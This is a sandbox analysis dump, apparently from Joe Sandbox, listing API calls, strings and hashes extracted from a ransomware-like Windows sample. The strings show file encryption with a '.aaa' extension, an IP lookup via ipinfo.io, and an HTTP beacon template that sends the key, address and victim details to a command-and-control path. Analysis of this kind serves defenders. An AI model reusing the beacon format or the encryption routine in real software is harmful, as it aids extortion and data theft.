                                                                                                                            • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 0041B433
                                                                                                                            • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 0041B443
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0041B516
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0041B52C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,CloseToolhelp32Snapshot), ref: 0041B538
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0041B544
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0041B550
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0041B55C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0041B568
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0041B574
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0041B580
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0041B58C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0041B598
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0041B5A4
                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0041B5B0
                                                                                                                            • GetTickCount.KERNEL32 ref: 0041B64A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$Library$Load$Free$CountTickVersion
                                                                                                                            • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next
                                                                                                                            • API String ID: 548066447-715222291
                                                                                                                            • Opcode ID: 073c3130b0a0d99d4bef3bd7d91e81b484a493f757e71c5bcc9876510200a30d
                                                                                                                            • Instruction ID: 9b0ab41e44d741afa709f8f910670cdf3924008bcb49aeebd6d02c398950f77e
                                                                                                                            • Opcode Fuzzy Hash: 073c3130b0a0d99d4bef3bd7d91e81b484a493f757e71c5bcc9876510200a30d
                                                                                                                            • Instruction Fuzzy Hash: D8F130706043459BD720DF65CC84B9BBBF8EFC8B44F04892EF59896250DB78D984CB9A
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00413D7D
                                                                                                                            • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,0043CD58,?,00413CC5), ref: 00413DB5
                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,0043CD58,?,00413CC5), ref: 00413DCD
                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413DE3
                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413DF6
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000010,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413E64
                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00413E67
                                                                                                                            • ReadFile.KERNEL32 ref: 00413E8F
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00413E9A
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00413EA3
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00413EA6
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0043CD58,?,00413CC5), ref: 00413ED1
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00413ED4
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00413EDB
                                                                                                                            • _memset.LIBCMT ref: 00413F00
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000080,00000000,?,?,?,?,?,?,?,?,?,0043CD58,?,00413CC5), ref: 00413F11
                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0043CD58,?,00413CC5), ref: 00413F14
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00413F5E
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00413F67
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00413F72
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00413F75
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00413F78
                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00413F99
                                                                                                                            • WriteFile.KERNEL32 ref: 00413FBD
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000010,00000000,00000000), ref: 00413FDD
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00413FEA
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00413FF3
                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 0041401E
                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 0041404A
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00414056
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0041405F
                                                                                                                            • FlushFileBuffers.KERNEL32(00000000), ref: 0041406E
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00414075
                                                                                                                            • MoveFileExW.KERNEL32(?,?,00000008), ref: 00414090
                                                                                                                            • GetLastError.KERNEL32 ref: 0041409A
                                                                                                                            • DeleteFileW.KERNEL32(?), ref: 004140AE
                                                                                                                            • Sleep.KERNEL32(00000190), ref: 004140B9
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004140DB
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 004140E4
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 004140EF
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 004140F2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$File$Process$Free$CloseHandleWrite$AllocAttributes_memset$BuffersCreateDeleteErrorFlushLastMovePointerReadSizeSleep
                                                                                                                            • String ID: .aaa
                                                                                                                            • API String ID: 3548932551-1861201198
                                                                                                                            • Opcode ID: 68c39bcf1484232cf43de51f81eb28d9a05a29aba7d762dc59e5f6cb8473fc38
                                                                                                                            • Instruction ID: 9007e59ba22c1aaf5beb208bc48bb55982d0225d1ffcd51d997189a139798c44
                                                                                                                            • Opcode Fuzzy Hash: 68c39bcf1484232cf43de51f81eb28d9a05a29aba7d762dc59e5f6cb8473fc38
                                                                                                                            • Instruction Fuzzy Hash: 8DB19871A00218ABEB15DBA4DC89FEE777CEF5C315F00419AF609E2290DB745E848B69
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0041A0B5
                                                                                                                            • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0,00000000,00000000,00000000,00000000), ref: 0041A0C6
                                                                                                                            • _memset.LIBCMT ref: 0041A0EE
                                                                                                                            • _alldiv.NTDLL(00000000,00000000,00000400,00000000), ref: 0041A16D
                                                                                                                            • _alldiv.NTDLL(00000000,?,00000400,00000000), ref: 0041A17A
                                                                                                                            • _memset.LIBCMT ref: 0041A1BC
                                                                                                                            • _memset.LIBCMT ref: 0041A21B
                                                                                                                            • _memset.LIBCMT ref: 0041A304
                                                                                                                            • _free.LIBCMT ref: 0041A38A
                                                                                                                            • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0041A3B0
                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00C03380,00000000), ref: 0041A3FA
                                                                                                                            • _memset.LIBCMT ref: 0041A417
                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0041A428
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A42E
                                                                                                                            • InternetReadFile.WININET(00000000,?,00000C16,?), ref: 0041A44B
                                                                                                                            • strstr.NTDLL ref: 0041A45E
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A472
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A475
                                                                                                                            • InternetCloseHandle.WININET(?), ref: 0041A496
                                                                                                                            • _free.LIBCMT ref: 0041A4AD
                                                                                                                            • ExitThread.KERNEL32 ref: 0041A54B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet_memset$CloseHandle$HttpOpenRequest_alldiv_free$ConnectErrorExitFileLastReadSendThreadstrstr
                                                                                                                            • String ID: $ KC$,JC$---!!!INSERTED!!!---$/inst.php?%s$/wp-content/themes/r.php?%s$2.0.4e1$GET$Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0$Subject=%s&key=%s&addr=%s&size=%lld&version=%s&OS=%ld&ID=%d&gate=%s&ip=%s&inst_id=%X%X%X%X%X%X%X%X$eirutyerg23895385tiyiruytyieye$gj$IC
                                                                                                                            • API String ID: 1974382559-2905488325
                                                                                                                            • Opcode ID: 9d594536b39e9284db085c7c5622c8f248ab59cab9e75238208731bfc2bad4b2
                                                                                                                            • Instruction ID: 54ce2dd3979e93718385dbc83f77f21fcc090a503bd1d9ebae0c96c4fc529177
                                                                                                                            • Opcode Fuzzy Hash: 9d594536b39e9284db085c7c5622c8f248ab59cab9e75238208731bfc2bad4b2
                                                                                                                            • Instruction Fuzzy Hash: 47D116B1108344AFD310DF65DC84FEBB7E8EB89348F04492EF589A7251D778A944CB6A
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,00000000,75DC55D0,00000000), ref: 0041ED29
                                                                                                                            • RtlGetVersion.NTDLL ref: 0041ED5A
                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 0041ED84
                                                                                                                            • NtQueryInformationProcess.NTDLL ref: 0041EDB0
                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 0041EDCB
                                                                                                                            • LoadIconW.USER32 ref: 0041EE1D
                                                                                                                            • RegisterClassExW.USER32(?), ref: 0041EE34
                                                                                                                            • VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 0041EE6A
                                                                                                                            • InterlockedExchange.KERNEL32(?,0041ECC0), ref: 0041EE83
                                                                                                                            • CreateWindowExW.USER32 ref: 0041EEA8
                                                                                                                            • GetStartupInfoW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041EEFA
                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(%systemroot%\system32\,?,00000104,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041EF29
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Current$ClassCreateEnvironmentExchangeExpandHandleIconInfoInformationInterlockedLoadModuleProtectQueryRegisterStartupStringsVersionVirtualWindow
                                                                                                                            • String ID: $%systemroot%\system32\$0$D
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: Findwcsstr$File_memset$CloseFirstNext__wcsdup_free
                                                                                                                            • String ID: IC$ L$.aaa$\*.*$recovery_file$restore_files
                                                                                                                            APIs
                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00001000,00000000,00000018,?), ref: 0041EAB3
                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0041EAB6
                                                                                                                            • NtQuerySystemInformation.NTDLL(0000000B,00000000,00001000,?), ref: 0041EAD1
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041EAE7
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0041EAEA
                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0041EB32
                                                                                                                            • _strcpy_s.LIBCMT ref: 0041EB5A
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041EB68
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0041EB6B
                                                                                                                            • LoadLibraryExA.KERNEL32(0000005C,00000000,00000001), ref: 0041EB7C
                                                                                                                            • GetProcAddress.KERNEL32(00000000,PsLookupProcessByProcessId), ref: 0041EB8E
                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0041EB9A
                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0041EBB6
                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0041EBB9
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$FreeProcess$LibrarySystem$AddressAllocDirectoryInformationLoadProcQuery_strcpy_s
                                                                                                                            • String ID: PsLookupProcessByProcessId$\
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0041A58A
                                                                                                                            • InternetOpenW.WININET(Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NE,00000004,00000000,00000000,00000000), ref: 0041A59F
                                                                                                                            • InternetOpenUrlW.WININET(00000000,http://ipinfo.io/ip,00000000,00000000,40000000,00000000), ref: 0041A5B8
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A5C5
                                                                                                                            • InternetReadFile.WININET(00000000,00000000,000000C8,?), ref: 0041A5EF
                                                                                                                            • _strcpy_s.LIBCMT ref: 0041A61D
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A62C
                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0041A62F
                                                                                                                            Strings
                                                                                                                            • Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NE, xrefs: 0041A59A
                                                                                                                            • http://ipinfo.io/ip, xrefs: 0041A5B2
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$CloseHandle$Open$FileRead_memset_strcpy_s
                                                                                                                            • String ID: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NE$http://ipinfo.io/ip
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00421AA0: GetTickCount.KERNEL32(?,?,?,?,004137A9,0043CD18,00000005), ref: 00421AB0
                                                                                                                              • Part of subcall function 00421AA0: _rand.LIBCMT ref: 00421AC0
                                                                                                                              • Part of subcall function 00421AA0: Sleep.KERNEL32(0000000F), ref: 00421AE7
                                                                                                                            • ExitThread.KERNEL32 ref: 004139A8
                                                                                                                              • Part of subcall function 0040EB90: _aullshr.NTDLL ref: 0040EC0D
                                                                                                                            • GetLogicalDriveStringsW.KERNEL32(00000100,?), ref: 004137D7
                                                                                                                            • _memset.LIBCMT ref: 004137F6
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: CountDriveExitLogicalSleepStringsThreadTick_aullshr_memset_rand
                                                                                                                            • String ID: A:\$B:\
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ....................$P6C$P6C$gfff
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: _aullshr
                                                                                                                            • String ID: 0>C$@:C$@:C
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: ....................$P6C$P6C
                                                                                                                            • API String ID: 2102423945-367312072
                                                                                                                            • Opcode ID: 91f7fd61f2b6367b2e8f1bd63c645b3c068b803abe8b87d30c7e6aed127f295a
                                                                                                                            • Instruction ID: c50ebbbe94665e3b61506474d11c71efd2640967613476eb690509a89d1b308a
                                                                                                                            • Opcode Fuzzy Hash: 91f7fd61f2b6367b2e8f1bd63c645b3c068b803abe8b87d30c7e6aed127f295a
                                                                                                                            • Instruction Fuzzy Hash: 31919F756083419BC714DF25D8C1A9BBBE5FFC8344F008A2EF99987201D775E84ACB96
                                                                                                                            APIs
                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 004255F2
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32 ref: 00425607
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(00431404), ref: 00425612
                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0042562E
                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 00425635
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2579439406-0
                                                                                                                            • Opcode ID: 03755ccaf70ad708b6f4fab71e6332518628caabaa0e7df61347e8e180b5b247
                                                                                                                            • Instruction ID: 6bb5de789a321063787ca96de7b9cd1f4631822c0065670583fbb202f00acfec
                                                                                                                            • Opcode Fuzzy Hash: 03755ccaf70ad708b6f4fab71e6332518628caabaa0e7df61347e8e180b5b247
                                                                                                                            • Instruction Fuzzy Hash: D021BCB4901348AFD700DF29F98AB443BB0FB18315F50713AEA0987672E7B459858F8E
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: P6C$gfff
                                                                                                                            • API String ID: 2102423945-1005010341
                                                                                                                            • Opcode ID: 2137c3bde973da1a7547dbdfd5203f66012a0d9a3b0adf8fcfe7f9488a6b87bc
                                                                                                                            • Instruction ID: 6c3f72de7210157f29cf342e4d814f1a2669bf009d892c6013dbe885ee46713a
                                                                                                                            • Opcode Fuzzy Hash: 2137c3bde973da1a7547dbdfd5203f66012a0d9a3b0adf8fcfe7f9488a6b87bc
                                                                                                                            • Instruction Fuzzy Hash: 1491D371A097418BC704CF69DC80AABBBE9AFC4310F044A2EF985D7251E778D954CB9B
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2102423945-0
                                                                                                                            • Opcode ID: 97b847d3d6f935b2559269f9b31054a1aeae503f4ce6babc75f64bca1739966b
                                                                                                                            • Instruction ID: de431158a44b3133534017a87b3374f1ebaac58181563200fe939117984d630c
                                                                                                                            • Opcode Fuzzy Hash: 97b847d3d6f935b2559269f9b31054a1aeae503f4ce6babc75f64bca1739966b
                                                                                                                            • Instruction Fuzzy Hash: 61A182153097C28BC335CA3D489519ABFE25FF6100748CA9DE8D787B87D524E9A8C7E2
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2102423945-0
                                                                                                                            • Opcode ID: 46a33e0e9512678b613f934be39408df8913caf37c51d019c81f1caad24d6c8e
                                                                                                                            • Instruction ID: cbc7c615108e09d339b68db207b3f0fd6d216c7b21e59e48f69948ad84cb62b7
                                                                                                                            • Opcode Fuzzy Hash: 46a33e0e9512678b613f934be39408df8913caf37c51d019c81f1caad24d6c8e
                                                                                                                            • Instruction Fuzzy Hash: AE4102513093C19BC725CE3D48D169BBFD15FA2100F88C98DE8D68BB87C068E968C7B1
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2102423945-0
                                                                                                                            • Opcode ID: bdd2566ff5411e6a4d49cb4e498a7bc632867271d99e16107ed95692fd197c3c
                                                                                                                            • Instruction ID: 0c2844e49b953b65b934c48b27b412c8fdb23d70e2a8bec69a6c319d4817b5ec
                                                                                                                            • Opcode Fuzzy Hash: bdd2566ff5411e6a4d49cb4e498a7bc632867271d99e16107ed95692fd197c3c
                                                                                                                            • Instruction Fuzzy Hash: E341A2502097C09EC725CE3D48D169ABFE59F66100F48C9CEE8D58BF87C168E659C3B1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: dd56a67d942ccbab2fd46126f377fd34714b8785daef123adf2bc6544120346b
                                                                                                                            • Instruction ID: c3b376da474397fd8bfabbf4f8d3275dc8984ae6232424f8755c8efce04c7dc3
                                                                                                                            • Opcode Fuzzy Hash: dd56a67d942ccbab2fd46126f377fd34714b8785daef123adf2bc6544120346b
                                                                                                                            • Instruction Fuzzy Hash: 5282AC70A043519FDB20CF14C9A0AAFB7E1BF88744F14492EE8859B340D779ED85CB9A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.345349501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.345346501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345355219.0000000000431000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345358212.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                            • Associated: 00000000.00000002.345365121.00000000004D8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_0t8amSU3vd.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: eA$eA
                                                                                                                            • API String ID: 0-1222041842
